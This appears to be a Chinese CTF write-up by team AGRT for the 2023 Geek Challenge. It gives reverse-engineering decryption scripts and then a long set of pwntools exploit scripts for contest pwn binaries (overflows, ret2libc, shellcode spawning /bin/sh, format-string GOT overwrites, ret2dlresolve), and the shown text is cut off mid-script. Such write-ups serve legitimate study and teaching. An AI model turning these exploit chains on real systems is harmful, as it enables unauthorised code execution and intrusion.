本文主要是介绍2023极客大挑战-AGRT战队wp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
RE
Shiftjmp
点击就送的逆向题
幸运数字
编辑
砍树
小黄鸭
flower-or-tea
mySelf
是男人就来扎针
听说cpp很难?
Easymath
寻找初音未来
Rainbow
浪漫至死不渝
ezandroid
Pwn
nc_pwntools
password
ret2text
write1
ret2libc
ezpwn
write2
fmt1.0
white_canary
why_n0t_puts
EVA
fmt2.0
fmt3.0
CRYPTO
ext^7gcd
EzComplex
card_game
Energetic_Carcano
编辑
JPGDiff
Simple3DES
Fi1nd_th3_x'
Diligent_Liszt
Signin
proof_of_work
SimpleRSA
OTPTwice
OldAlgorithm
easy_classic
PolyRSA
Just need one
WEB
unsign
EzHttp
n00b_Upload
easy_php
ctf_curl
flag保卫战
klf_ssti
ez_remove
ez_path
you konw flask?
Pupyy_rce
famale_imp_l0ve
雨
ez_php
scan_tool
klf_2
EzRce
ezpython
change_it
ezrfi
Akane!
klf_3
ez_sql
MISC
下一站是哪呢
窃听风云
extractMe
ez_smilemo
DEATH_N0TE
Qingwan心都要碎了
xqr
DEATH_N1TE
give_me_Goerlieth
SimpleConnect
DEATH-N2TE
stage
RE
Shiftjmp
花指令
0x117A+1地址改为90(nop)去除花指令
找到加密函数
写出解密脚本
a = "SXAxS6jd8doTxBQ{x\"Ma\'csE-|El,o/{^\\"
for i in range(len(a)):print(chr(ord(a[i]) ^ i), end="")
运行得flag:SYC{W3lc0me_tO_th3_r3veR5e_w0r1d~}
点击就送的逆向题
文件为.s后缀文件看起来比较麻烦,直接用gcc编译成可执行文件
编写解密脚本
a = "Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM"for i in a:print(chr(ord(i) - 7 ), end="")
flag:SYC{SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF}
幸运数字
算法简单懒得分析了直接爆破
a0 = [13, 7, 29, 37, 29, 110, 48, 57, 44, 63, 42, 43, 50, 63, 42, 55, 110, 48, 48, 48, 48, 45, 1, 7, 49, 43, 1, 57, 31,59, 45, 45, 27, 58, 1, 12]a1 = "o96*#"for i in a1:a0.append(ord(i))flag = []for i in range(221):flag = ""for j in a0:flag += (chr(j ^ i))if flag[:3] == "SYC":print(flag)
得到flagSYC{C0ngratulati0nnnns_You_gAessEd_R1ght}
砍树
Apk逆向
可以看到找不到这个关键函数I0o0I改一下后缀解压去lib里找找
找到加密函数
a = [0, 32, 32, 23, 27, 54, 14, 54, 38, 23, 4, 42, 41, 7, 38, 21, 82, 51, 45, 15, 58, 39, 17, 6, 51, 7, 70, 23, 61, 10, 60, 56, 46, 34, 24]
key = "Sycloverforerver"
for i in range(len(a)):print(chr(a[i] ^ ord(key[i % 7])), end="")
flag:SYC{t@ke_thE_bul1_By_the_h0rns_TAT}‘
小黄鸭
好多py开头的判断是py转的exe
得到1.pyc
用python的uncompyle6工具反编译为py得到代码
根据代码写出脚本
def upper(num):num = num % 26while 1:if 'A' <= chr(num) <= 'Z':return chr(num)else:num = num + 26def lower(num):num = num % 26while 1:if 'a' <= chr(num) <= 'z':return chr(num)else:num = num + 26arr = '~h|p4gs`gJdN`thPwR`jDn`te1w`2|RNH'
arr1 = ""
arr2 = ""
for i in arr:arr1 += chr(ord(i) - 2)
for i in arr:arr2 += chr(ord(i) - 1)
arr = list(arr)b = []
for i in range(len(arr)):if (arr1[i]).isalpha():c = arr1[i]if 'A' <= c <= 'Z':b.append(upper(ord(c) + 13))elif 'a' <= c <= 'z':b.append(lower(ord(c) + 13))continueb.append(arr2[i])
for i in range(len(b)-1, -1, -1):print(b[i], end="")
运行得flag(应该是“{”和“m”在解密中都符合题目中得条件,代码优先取了m改成“{”就得到flag)
Flag:SYC{1_h0pe_yOu_ChAse_YoUr_dr3ams}
flower-or-tea
nop掉花指令,明显的tea,写exp如下
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<conio.h>
#include<time.h>
#include <windows.h>
#include <stdbool.h>
#include <io.h>
#include <stdint.h>
#include <stdbool.h>
#include <zconf.h>
#include <ctype.h>
#include <math.h>
#include <ntstatus.h>
#include <winsock2.h>int __cdecl run_tea(unsigned int a1, unsigned int *a2, int *a3)
{int result; // eaxunsigned int i; // [esp+8h] [ebp-10h]unsigned int v5; // [esp+Ch] [ebp-Ch]unsigned int v6; // [esp+10h] [ebp-8h]unsigned int v7; // [esp+14h] [ebp-4h]v6 = *a2;v5 = a2[1];v7 = 0;for ( i = 0; i < a1; ++i ){v5 += v7 ^ (a3[(v7 >> 11) & 3] + v7) ^ (v6 + ((v6 >> 5) ^ (16 * v6)));v6 += (a3[v7 & 3] + v7) ^ (v5 + ((v5 >> 5) ^ (16 * v5)));v7 += 826366247;}*a2 = v6;result = 4;a2[1] = v5;return result;
}
int __cdecl dec_tea(unsigned int a1, unsigned int *a2, int *a3)
{int result; // eaxunsigned int i; // [esp+8h] [ebp-10h]unsigned int v5; // [esp+Ch] [ebp-Ch]unsigned int v6; // [esp+10h] [ebp-8h]unsigned int v7; // [esp+14h] [ebp-4h]v6 = *a2;v5 = a2[1];v7 = 0;for (int j = 0; j < a1; ++j) {v7 += 826366247;}for ( i = 0; i < a1; ++i ){v7 -= 826366247;v6 -= (a3[v7 & 3] + v7) ^ (v5 + ((v5 >> 5) ^ (16 * v5)));v5 -= v7 ^ (a3[(v7 >> 11) & 3] + v7) ^ (v6 + ((v6 >> 5) ^ (16 * v6)));}*a2 = v6;result = 4;a2[1] = v5;return result;
}
int run() {int v13[40]; // [esp+CCh] [ebp-E4h]int v14[4];v14[0] = 32;v14[1] = 27;v14[2] = 39;v14[3] = 44;v13[0] = -1694939573;v13[1] = -1005078370;v13[2] = -1307072749;v13[3] = -918836760;v13[4] = -1795955634;v13[5] = -1244910923;v13[6] = 1146217516;v13[7] = 2055874714;v13[8] = 1405669384;v13[9] = 1846639433;v13[10] = -1677731948;v13[11] = 1593781753;v13[12] = 401024305;v13[13] = -541222535;v13[14] = -1886971078;v13[15] = 1944634796;v13[16] = -1299812186;v13[17] = 1526113129;v13[18] = 754440740;v13[19] = 880502447;v13[20] = -1178055328;v13[21] = -1860267729;v13[22] = -1118163045;v13[23] = -879332550;v13[24] = -979801922;v13[25] = -1610607639;v13[26] = -1053864284;v13[27] = -561628656;v13[28] = -1597713004;v13[29] = 1132501052;v13[30] = 2117039688;v13[31] = -447882103;v13[32] = 1059563152;v13[33] = -1249037927;v13[34] = 1615521047;v13[35] = -1668269692;v13[36] = -186628991;v13[37] = 1022684671;v13[38] = 0;v13[39] = 0;int v15[2];char flag[39];for (int i = 0; i < 0x26 / 2; ++i ){v15[0] = v13[2 * i];v15[1] = v13[2 * i + 1];dec_tea( 54, (unsigned int *)&v15, v14);flag[i] = (char)v15[0];flag[0x26 - i - 1] = (char)v15[1];}printf("%s", flag);return 0;
}int main() {
// test();run();
// main_def();return 0;
}
mySelf
动调进tea加密,写exp直接出
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<conio.h>
#include<time.h>
#include <windows.h>
#include <stdbool.h>
#include <io.h>
#include <stdint.h>
#include <stdbool.h>
#include <zconf.h>
#include <ctype.h>
#include <math.h>
#include <ntstatus.h>unsigned int __cdecl sub_DD13B0(unsigned int *a1)
{int v1; // ebxint v2; // ediunsigned int v3; // esiint v4; // ebxunsigned int result; // eaxunsigned int *v6; // [esp+Ch] [ebp-Ch]unsigned int *v7; // [esp+10h] [ebp-8h]int v8; // [esp+14h] [ebp-4h]v1 = 0;v8 = 0;do{v2 = 0;v3 = a1[v1];v7 = &a1[v1];v6 = &a1[v1 + 1];v4 = 32;int index = 32;result = *v6;do{v2-=1640531527;index--;}while ( index );do{result -= ((v3 >> 5) + 4) ^ (16 * v3 + 3) ^ (v2 + v3);v3 -= ((result >> 5) + 2) ^ (16 * result + 2) ^ (v2 + result);v2 += 1640531527;--v4;}while ( v4 );v8 += 2;v1 = v8;*v7 = v3;*v6 = result;}while ( v8 < 8 );return result;
}
unsigned char enc_data[] ={240, 249, 189, 189, 196, 148, 97, 226, 37, 145,121, 128, 25, 194, 15, 31, 21, 24, 106, 235,197, 114, 245, 132, 133, 58, 204, 64, 187, 42,163, 210,0};
int run() {sub_DD13B0((unsigned int*)enc_data);printf("%s", enc_data);return 0;
}int main() {
// test();run();
// main_def();return 0;
}
是男人就来扎针
Exp:简单C#,直接patch掉针的命中就行
加个flag头就ok了
听说cpp很难?
题太多了,说不动了,直接贴exp吧
逻辑是每位((a+10)^10) -10
aaa=[0]*33
aaa[0] = 0x4D;
aaa[1] = 0x5F;
aaa[2] = 0x3D;
aaa[3] = 0xFFFFFF85;
aaa[4] = 0x37;
aaa[5] = 0x68;
aaa[6] = 0x73;
aaa[7] = 0x57;
aaa[8] = 0x27;
aaa[9] = 0x68;
aaa[10] = 0x51;
aaa[11] = 0x59;
aaa[12] = 0x7F;
aaa[13] = 0x26;
aaa[14] = 0x6B;
aaa[15] = 0x59;
aaa[16] = 0x73;
aaa[17] = 0x57;
aaa[18] = 0x55;
aaa[19] = 0x5B;
aaa[20] = 0x59;
aaa[21] = 0x6F;
aaa[22] = 0x6A;
aaa[23] = 0x59;
aaa[24] = 0x27;
aaa[25] = 0x57;
aaa[26] = 0x72;
aaa[27] = 0x57;
aaa[28] = 0x4F;
aaa[29] = 0x57;
aaa[30] = 0x78;
aaa[31] = 0x78;
aaa[32] = 0xFFFFFF83;a = [c&0xff for c in aaa]
a=[c+10 for c in a]
a=[c^10 for c in a]
flag=[c-10 for c in a]#SYC{Anma1nG_y0u_maKe_it_1alaIa~~}
Easymath
from z3 import *s=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 19, 22, 26, 27, 28, 29, 31, 32, 50, 51, 52, 53, 54, 55]
table='01234_asdzxcpoityumnbAOZWXGMY'
matrix=[0x00000012, 0x0000001D, 0x00000010, 0x00000013, 0x0000001B, 0x00000008, 0x0000001F, 0x00000008, 0x00000017, 0x0000001E, 0x0000001D, 0x00000003, 0x0000001C, 0x0000000A, 0x00000015, 0x00000012, 0x0000001D, 0x00000008, 0x00000010, 0x0000001C, 0x0000000B, 0x0000001E, 0x00000007, 0x00000014, 0x00000007 ]last = [BitVec('a%i'%i,32) for i in range(25)]
sol = Solver()v7=[0]*25for i in range(5):for j in range(5):v7[5*i+j] == 0for k in range(5):v7[5 * i + j] =( v7[5 * i + j]+ last[5 * i + k] * matrix[5 * k + j]) & 0x1Fsol.add(Not(And(i==j, v7[5 * i + j] != 1)))sol.add(Not(And(i != j , v7[5 * i + j]!=0 )))print sol.check()t=[11,19,9,5,12,14,6,22,27,16,26,28,29,29,11,4,31,22,13,8,27,29,10,16,16]for i in range(len(t)):print table[s.index(t[i])],
#SYC{xtd4co_ymiunbbx3Aypsmbzii}
寻找初音未来
据输入的色号修改后面rc4的key的, 初音未来色是39C5BB
第1次输入是39C5BB
第2次输入32*'a'
在比较处下断点,rc4解密
a=[0x25, 0x6F, 0x3D, 0x6C, 0xF9, 0xE0, 0xCF, 0x3F, 0x2E, 0x24, 0xC6, 0x7B, 0x81, 0xBF, 0x55, 0x4F, 0x0D, 0x99, 0x87, 0x47, 0x48, 0xF7, 0xB9, 0x98, 0xFB, 0x1B, 0x22, 0xEC, 0x84, 0x23, 0xFD, 0xB2]
b=[ 0x17, 0x57, 0x1F, 0x76, 0xD6, 0xB1, 0xDA, 0x36, 0x26, 0x2B, 0xC0, 0x45, 0xD1, 0xAD, 0x6B, 0x5D, 0x29, 0x8A, 0x8F, 0x69, 0x5C, 0xE5, 0x87, 0xBB, 0xEF, 0x0E, 0x1C, 0xC0, 0xAC, 0x29, 0xE9, 0xAE]
pt = [ord('a')]*32flag=''
for i in range(32):flag += chr(a[i]^b[i]^pt[i])
print(flag)
#SYC{N0thing_1s_sEriOus_But_MIku}
Rainbow
from libnum import *
v = [0]*4
v[0] = 0x627B44508E415865
v[1] = 0x847D6C49547E4A57
v[2] = 0x4877646060955B4F
v[3] = 0x622D3C689F7B4D7Dfrom libnum import *
s = b''for c in v:s += n2s(c)[::-1]
s = s.decode('latin-1')s=[ord(c) for c in s]for i in range(32):s[i] ^= ifor i in range(32):if i%3==0:s[i] -= 18print(''.join(map(chr,s)))
#SYC{TAke_1t_3asy_Just_a_STart!!}
浪漫至死不渝
在文件夹里找到index.js
在代码中找到decryptRailFence函数调用的地方,分析可知,该函数的参数固定,TEXT1可以直接跑出来
继续分析,Text1是异或的密钥,TEXT1用在线js运行工具跑出来,得到异或的密钥:5201314WXHN
function decryptRailFence(cipherText, ooo0oooo) {const fence = new Array(ooo0oooo);for (let i = 0; i < ooo0oooo; i++) {fence[i] = new Array(cipherText.length).fill('.');}let row = 0;let oooo0o0o0 = 1;for (let i = 0; i < cipherText.length; i++) {if (row === 0) {oooo0o0o0 = 1;} else if (row === ooo0oooo - 1) {oooo0o0o0 = -1;}fence[row][i] = '*';row += oooo0o0o0;}let index = 0;for (let i = 0; i < ooo0oooo; i++) {for (let j = 0; j < cipherText.length; j++) {if (fence[i][j] === '*') {fence[i][j] = cipherText[index++];}}}let oooOOOOO0000O0O0O0 = '';row = 0;oooo0o0o0 = 1;for (let i = 0; i < cipherText.length; i++) {oooOOOOO0000O0O0O0 += fence[row][i];if (row === 0) {oooo0o0o0 = 1;} else if (row === ooo0oooo - 1) {oooo0o0o0 = -1;}row += oooo0o0o0;}return oooOOOOO0000O0O0O0;
}
const ooo0oooo = 3;
const key = '53X211WH04N';
const Text1 = decryptRailFence(key, ooo0oooo);
console.log(Text1)
//5201314WXHN
ezandroid
找到MainActivity
分析可知,sb2,sb3分别对应输入的奇偶下标对应值
跟踪sb2
sb2转换成string类型sb4,sb4转换成bytes类型bytes,继续跟踪bytes
这里按位运算,实质上是bytes数组转换成了int数组iArr
继续跟踪iArr
简单的tea加密和逆变换到bytes类型
sb2分析到这结束,继续分析sb3
同样先转换成sb5,跟踪sb5,到MainActivity2
发现就是一个异或加密
exp:
from z3 import *
from ctypes import *
enc = [-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80]
S = Solver()
j = 0
X = [BitVec('x%s'%i,32)for i in range(3)]
for i in range(3): S.add(enc[j+3]==(X[i]&255)) S.add(enc[j+2]==((X[i]>>8)&255)) S.add(enc[j+1]==((X[i]>>16)&255)) S.add(enc[j]==((X[i]>>24)&255)) j += 4
if S.check() == sat: m = S.model() for i in range(len(X)): print(m[X[i]],end=',')
iArr = [2784531145,3477828365,3029296720]
# #include <stdio.h>
# #include <windows.h>
# unsigned int k[]= {2784531145,3477828365,3029296720};
# int iArr[3];
# int iArr2[] = {2023708229, -158607964, -2120859654, 1167043672}; # int main()
# {
# for(int i=0;i<3;i++){
# iArr[i] = (int)k[i];
# }
# int i9 = iArr[0];
# int i10 = iArr[2];
# int i11 = iArr[1];
# int i12 = iArr2[0];
# int i13 = iArr2[1];
# int i14 = iArr2[2];
# int i15 = iArr2[3];
# int i16 = -1640531527*64;
# for (int i18 = 0; i18 < 32; i18++) {
# i10 -= (((i11 << 4) + i14) ^ (i11 + i16)) ^ ((i11 >> 5) + i15);
# i11 -= (((i10 << 4) + i12) ^ (i10 + i16)) ^ ((i10 >> 5) + i13);
# i16 += 1640531527;
# }
# for (int i17 = 0; i17 < 32; i17++) {
# i10 -= (((i9 << 4) + i14) ^ (i9 + i16)) ^ ((i9 >> 5) + i15);
# i9 -= (((i10 << 4) + i12) ^ (i10 + i16)) ^ ((i10 >> 5) + i13);
# i16 += 1640531527;
# }
# iArr[0] = i9;
# iArr[1] = i10;
# iArr[2] = i11;
# printf("%d,%d,%d",iArr[0],iArr[1],iArr[2]);
# system("pause");
# return 0; # }
#after teaDecode
iArr = [1412454004,859001966,812217458]
print()
plaintext = []
f = "012345678901234567890"
for i in range(len(iArr)): if iArr[i] < 0: iArr[i] = 2**32 + iArr[i] b = bin(iArr[i])[2:].rjust(32,'0') for i in range(0,32,8): c = b[i:i+8] str = chr(int(c,2)) plaintext.append(str)
print(plaintext)#偶
# #include <stdio.h>
# #include <windows.h> # int main()
# {
# char iArr[] = {-107, -106, -95, -115, -119, 127, 26, 121, -62, -20, 86, 9};
# char enc[] = {-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80};
# char plaintext2[12];
# for(int i=0;i<12;i++)plaintext2[i] = (char)iArr[i]^enc[i];
# for(int i=0;i<12;i++)printf("%c,",plaintext2[i]);
# system("pause");
# return 0;
# }
plaintext2= ['0','n','3','D','F','4','i','t','v','c','0','Y']#奇
flag = ''
for i in range(len(plaintext)): flag += plaintext[i] flag += plaintext2[i]
print(flag)
#flag:SYC{T00nV3tD3F34Tint0vict0rY}
#flag:SYC{T00nV3tD3F34Tint0vict0rY}
Pwn
nc_pwntools
按照要求输入即可完成
from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')p = process('./chal')#p = remote('pwn.node.game.sycsec.com', 30060)#elf = ELF('./chal')#libc=ELF("/glibc-all-in-one/libs/2.34-0ubuntu3.2_amd64/libc.so.6")#libc = ELF('./libc-2.31.so')rl("should in the end")rl("\n")pay=b'a'*(92)+b'\x53\x79\x63\x6c\x6f\x76\x65\x72's(pay)rl("2.This challenge is harder than first one\n")c=rl("=?")[:-2]s=c.decode()print(s)print(str(eval(s)))sl(str(eval(s)))inter()
password
dev/urandom多次打开可能会报0,这里利用这个特点进行爆破
from pwn import *#context.log_level="debug"for i in range(200):try:io=remote("pwn.node.game.sycsec.com",31428)#io=process("./password")#gdb.attach(io)#pause()#print('----------------')print(i)io.recvuntil("please enter user name:")io.send(b"a"*0x28+p64(0x4012f3))io.recvuntil("please enter password:")io.sendline(b"\x00"*0x8)text=io.recvuntil(b"password!").decode()if "Correct" in text:print('*************')flag=1io.interactive()print(text)io.close() except:io.close()if flag==1:print("&&&&&&&&&&&&")
ret2text
把返回地址改一个字节就可以覆盖返回地址为后门地址
from pwn import *li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('pwn.node.game.sycsec.com', 31296)
#elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')rl("The simplest but not too simple pwn\n")
pay=b'a'*(0x58)+b'\x27'
s(pay)inter()inter()
write1
看逻辑,按照要求整就完事了
from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')
#p = process('./chal1')
p = remote('pwn.node.game.sycsec.com', 31387)
#elf = ELF('./chal1')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')sl(b'a')rl("index:")
sl(str(40))rl("value:")
sl(b"d8")rl("index:")
#bug()
sl(str(41))
rl("value:")
sl(b"ff")rl("index:")
#bug()
sl(str(-1))
inter()
ret2libc
ret2csu题目,控制rdx,泄露·libc打ret2libc
from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')
#p = process('./chal2')
p = remote('pwn.node.game.sycsec.com', 30607)
elf = ELF('./chal2')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF('./libc.so.6')rdi=0x0000000000401333
rsi_r15=0x0000000000401331rl("This challenge no backdoor!")
pay=b'\x00'*(0x10+8)+p64(0x40132A)+p64(0)+p64(1)+p64(1)+p64(elf.got['write'])+p64(6)+p64(elf.got['write'])+p64(0x401310)+p64(0)*7+p64(0x4011FD)
#bug()
sl(pay)libc_base=get_addr()-libc.sym['write']
li(hex(libc_base))system,bin=get_sb()rl("This challenge no backdoor!")
pay=b'\x00'*(0x10+8)+p64(rdi)+p64(bin)+p64(rdi+1)+p64(system)
#bug()
sl(pay)inter()
ezpwn
先写入一个read的shellcode,写到rsi里,就能让程序执行shellcode
from pwn import *li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./pwn')p = remote('pwn.node.game.sycsec.com', 31479)#elf = ELF('./pwn')#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")#libc = ELF('./libc-2.31.so')pay=b'\x90'*8+asm(shellcraft.read(0,"rsi",0xff))#bug()s(pay)pause()pay=b'\x90'*0x40+asm(shellcraft.sh())s(pay)inter()
write2
按照要求完成即可
from pwn import *li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')
#p = process('./chal3')
p = remote('pwn.node.game.sycsec.com', 30672)
#elf = ELF('./chal3')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')#pay=asm('''
#jmp rsp#''')
#for i in range(len(pay)):
# print(hex(pay[i]),end=',')
a=[0x6a,0x68,0x48,0xb8,0x2f,0x62,0x69,0x6e,0x2f,0x2f,0x2f,0x73,0x50,0x48,0x89,0xe7,0x68,0x72,0x69,0x1,0x1,0x81,0x34,0x24,0x1,0x1,0x1,0x1,0x31,0xf6,0x56,0x6a,0x8,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5]
b=[0xff,0xe4]
'''
sl(b'a')pay=asm(shellcraft.sh())
for i in range(len(pay)):
print(hex(pay[i]),end=',')
'''
def add(i,v):
rl("index:\n")
sl(str(i))
rl("value:")
sl(v)sl(b'a')
rl("index_addr:")
stack=hex(int(p.recv(14),16)+4)[2:14]
print(stack)
print(stack[0]+stack[1])
k=0
for i in range(6):
add(45-i,stack[k]+stack[k+1])
k=k+2
for i in range(len(b)):
e=hex(b[i])[2:]
add(i,e)for i in range(len(a)):
e=hex(a[i])[2:]
add(48+i,e)rl("index:\n")
sl(str(-1))
#bug()
inter()inter()
fmt1.0
修改返回地址为one_gadget即可
from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./fmt')p = remote('pwn.node.game.sycsec.com', 30864)elf = ELF('./fmt')#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libc = ELF('./libc.so.6')rl("Please enter your username: \n")pay=(b'%7$saaaa'+p64(elf.got['read'])).ljust(0x58,b'\x00')+p64(0x4010F0)#bug()s(pay)libc_base=get_addr()-libc.sym['read']li(hex(libc_base))one_gad=libc_base+0xe3b01rl("Please enter your username: \n")pay=(b'%7$paaaa'+p64(elf.got['read'])).ljust(0x58,b'\x00')+p64(one_gad)s(pay)inter()
white_canary
按照它的算法,还原canary即可,然后orw读flag
from pwn import *
from ctypes import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):p.send(a)
def sa(a, b):p.sendafter(a, b)
def sl(a):p.sendline(a)
def sla(a, b):p.sendlineafter(a, b)
def r():p.recv()
def pr():print(p.recv())
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def bug():gdb.attach(p)pause()
def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')
#p = process('./chal4')
p = remote('pwn.node.game.sycsec.com', 31922)
#elf = ELF('./chal4')
libc = cdll.LoadLibrary('./libc.so.6')
srand=libc.srand(libc.time(0)%60)
v2 = libc.rand()
v3= libc.rand()
can=(((v2 >> 4) ^ (16 * v3 + (v3 >> 8) * (v2 << 8))) >> 32)+ ((((v2 >> 48) + (v2 << 16) * (v3 >> 16)) ^ (v3 << 48)) << 32)
print(can)
canary=(hex(can)[:13:-1])[::-1]
canary=int(canary,16)
print(hex(canary))payload=asm(shellcraft.open("flag"))
payload+=asm(shellcraft.read(3,0x4040A0+0x200,0x50))
payload+=asm(shellcraft.write(1,0x4040A0+0x200,0x50))rl("Please enter your name:\n")
sl(payload)rl("tell me something:")
pay=b'a'*(0x8)+p64(canary)*2+p64(0x4040E0)sl(pay)inter()
why_n0t_puts
ret2dlresolve板子题
from pwn import *#p=process("./chal11")elf = context.binary = ELF('./chal11')p = remote("pwn.node.game.sycsec.com",31338)rop = ROP(elf)# create the dlresolve objectdlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop.raw('A' * 56)rop.read(0, dlresolve.data_addr)rop.ret2dlresolve(dlresolve)log.info(rop.dump())p.sendline(rop.chain())p.sendline(dlresolve.payload)p.interactive()
EVA
利用任意地址写,把stack_check_faill的got表修改为main函数地址,然后再泄露libc地址,之后把puts的got表改成one_gadget即可
from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./EVA')p = remote('pwn.node.game.sycsec.com', 30243)elf = ELF('./EVA')#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libc = ELF('./libc.so.6')main=0x401282rl("Do you know <Neon Genesis Evangelion>\n")sl(str(0))rl("I'll punish you to go back and watch\n")pay=p64(0x404030+0x40+0x10)+p64(0x401355)#bug()s(pay)pay=p64(0x401282)s(pay)rl("Do you know <Neon Genesis Evangelion>\n")sl(str(0))rl("I'll punish you to go back and 